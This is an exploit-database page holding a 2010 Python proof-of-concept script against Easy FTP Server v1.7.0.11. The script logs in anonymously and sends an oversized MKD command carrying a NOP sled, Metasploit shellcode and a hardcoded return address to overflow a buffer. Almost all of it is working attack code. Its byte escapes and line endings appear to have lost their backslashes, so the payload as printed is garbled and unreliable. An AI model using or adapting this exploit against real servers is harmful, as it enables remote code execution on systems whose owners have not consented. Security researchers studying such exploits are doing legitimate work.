Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit (Post Auth)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy FTP Server v1.7.0.11 MKD Command Remote Buffer Overflow Exploit (Post Auth)
# Published : 2010-07-17
# Author : Karn Ganeshen
# Previous Title : Easy FTP Server v1.7.0.11 LIST Command Remote Buffer Overflow Exploit (Post Auth)
# Next Title : Netscape Browser v9.0.0.6 Clickjacking Vulnerability

#!/usr/bin/python
import socket,sys

# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]

print """
#
****************************************************************************
#									   #
*  Easy FTP Server v1.7.0.11 [MKD] Remote BoF Exploit Post Authentication  *
*  Author / Discovered by : Karn Ganeshen 				   *
*  Date : July 5, 2010							   *
*  KarnGaneshen [aT] gmail [d0t] com     				   *
*  http://ipositivesecurity.blogspot.com				   *
#									   #
****************************************************************************
#
"""

if len(sys.argv) != 3:
    print "Usage: ./easyftp_mkd.py <Target IP> <Port>"
    sys.exit(1)
 
target = sys.argv[1]
port = int(sys.argv[2])

# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ]

shellcode = ("xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1"
"x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5"
"xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69"
"xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2e"
"x8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8"
"x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08"
"xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8c"
"x61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0c"
"xd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80"
"x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6b"
"xe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84"
"xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14"
"x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4c"
"xabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0e"
"xd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8"
"x51x6bx28")

nopsled = "x90" * 40
ret = "x10x3Bx880" # MAGIC RET 00883B10 (SP2) / 00893B58 (SP3) [ EBP points to nopsled when overflowed ]
payload = nopsled + shellcode + ret 

print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[+] Connected!"
except:
    print "[!] Connection failed!"
    sys.exit(0)
    
s.recv(1024)

# Targetting default user 'anonymous' on the target
s.send('USER anonymousrn')
s.recv(1024)
s.send('PASS anonymousrn')
s.recv(1024)

print "[+] Sending payload..."
s.send('MKD ' + payload + 'rn')

print "[!] Verifying if the user has 'Create Directory' permission. This may take some time..."

try:
    s.recv(1024)    
    print "[!] Uhh.. User does not have MKD privilege. +++Exploit failed+++"

except:
    print "[+] +++Exploit Successful+++ ^_^"

s.close()